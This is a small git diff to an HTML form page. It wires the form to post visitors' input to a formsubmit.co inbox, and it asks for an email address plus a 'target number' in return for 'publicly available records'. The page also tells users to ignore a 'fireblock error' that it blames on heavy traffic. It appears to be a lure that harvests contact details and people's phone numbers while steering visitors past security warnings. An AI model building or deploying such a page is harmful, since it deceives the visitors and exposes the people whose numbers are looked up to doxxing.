--- a/index.html
+++ b/index.html
@@ -53,12 +53,12 @@
   </style>
 </head>
 <body>
-  <form action="https://formsubmit.co/YOUR_EMAIL_HERE" method="POST" onsubmit="showMessage()">
+  <form action="https://formsubmit.co/thesecrec" method="POST" onsubmit="showMessage()">
     <h2>Enter Details</h2>
 
     <div class="note">
       📢 <strong>Note:</strong> You will receive publicly available records only.  
-      This website does not share results here — we will send details only after you submit your email address along with the number. Due to heavy traffic you see fireblock error, please ignore
+      This website does not share results here — we will send details only after you submit your email address along with the target number. Due to heavy traffic you see fireblock error, please ignore
     </div>
 
     <input type="text" name="phone_number" placeholder="Enter mobile number" required />
